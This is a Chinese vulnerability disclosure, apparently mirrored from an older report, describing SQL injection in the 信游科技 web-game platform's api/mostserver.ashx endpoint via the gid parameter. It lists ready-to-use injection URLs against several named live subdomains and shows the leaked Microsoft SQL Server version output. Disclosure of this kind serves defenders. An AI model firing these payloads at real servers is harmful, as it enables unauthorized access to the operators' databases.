信游科技页游平台程序新版通用型SQL注入三发

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

### 简要描述: 我也来多处注入吧。已在多个服务器上测试成功,我也不知道前面的哥们提交过哪个了因为都还没修复 ### 详细说明: 注入点1:api/mostserver.ashx 暴mssql版本号,gid参数: http://ht.52xinyou.cn/api/mostserver.ashx?gid=1%20and%20@@version%3E0 http://xy001.52xinyou.cn/api/mostserver.ashx?gid=1%20and%20@@version%3E0 http://xy002.52xinyou.cn/api/mostserver.ashx?gid=1%20and%20@@version%3E0 http://xy003.52xinyou.cn/api/mostserver.ashx?gid=1%20and%20@@version%3E0 http://xy004.52xinyou.cn/api/mostserver.ashx?gid=1%20and%20@@version%3E0 http://xy005.52xinyou.cn/api/mostserver.ashx?gid=1%20and%20@@version%3E0 http://xy006.52xinyou.cn/api/mostserver.ashx?gid=1%20and%20@@version%3E0 [<img src="https://images.seebug.org/upload/201401/15192001789f8869fdf0dfdc3ccaa2d00e5b14de.jpg" alt="20140115191906.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201401/15192001789f8869fdf0dfdc3ccaa2d00e5b14de.jpg) Microsoft SQL Server 2008 R2 (RTM) - 10.50.1600.1 (Intel X86) Apr 2 2010 15:53:02 Copyright (c) Microsoft Corporation Data...

0%
暂无可用Exp或PoC
当前有0条受影响产品信息